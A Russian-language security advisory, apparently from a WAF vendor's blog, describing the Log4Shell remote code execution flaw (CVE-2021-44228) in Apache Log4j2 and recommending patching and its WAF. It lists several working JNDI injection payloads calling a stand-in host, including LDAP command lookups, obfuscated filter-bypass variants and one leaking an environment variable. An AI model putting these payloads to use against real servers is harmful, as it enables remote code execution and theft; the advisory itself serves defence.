Исследователь Chen Zhaojun из Alibaba Cloud Security обнаружил критичную RCE-уязвимость (CVE-2021-44228) в популярном фреймворке для сбора логов Apache Log4j2. Уязвимость, получившая название Log4Shell, позволяет атакующему выполнять произвольный код на удаленном сервере и содержится в версиях Apache Log4j2 от 2.0-beta9 до 2.14.1.

Информация представлена в ознакомительных целях, не нарушайте законодательство

Уязвимость возникает в функции JNDI в Apache Log4j2, позволяя злоумышленнику передать специально сформированную строку, содержащую параметры подключения к удаленному серверу, с которого произойдет получение и выполнение произвольного кода. Оригинальный эксплойт содержал пример с использованием удаленного LDAP-сервера, но вскоре был дополнен вариациями с использованием DNS, RMI, IIOP и попытками обхода:

${jndi:dns://example.com/...}
${jndi:rmi://example.com/...}
${jndi:ldap://example.com/Basic/Command/Base64/...}
${jndi:${lower:l}${lower:d}a${lower:p}://ex${upper:a}mple.com/...}
${${::-j}${::-n}${::-d}${::-i}${::-r}${::-m}${::-i}://example.com/...}
$\{$\{::-j\}$\{::-n\}$\{::-d\}$\{::-i\}:$\{::-r\}$\{::-m\}$\{::-i\}://$\{env:USER\}.example.com/...}
${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//example.com/...}

Сообщается, что разработчик уже выпустил экстренный патч и рекомендует выполнить обновление, а мы, в свою очередь, также рекомендуем использовать Nemesida WAF, блокирующий попытки эксплуатации этой и других уязвимостей, включая техники обхода. Оставайтесь защищенными.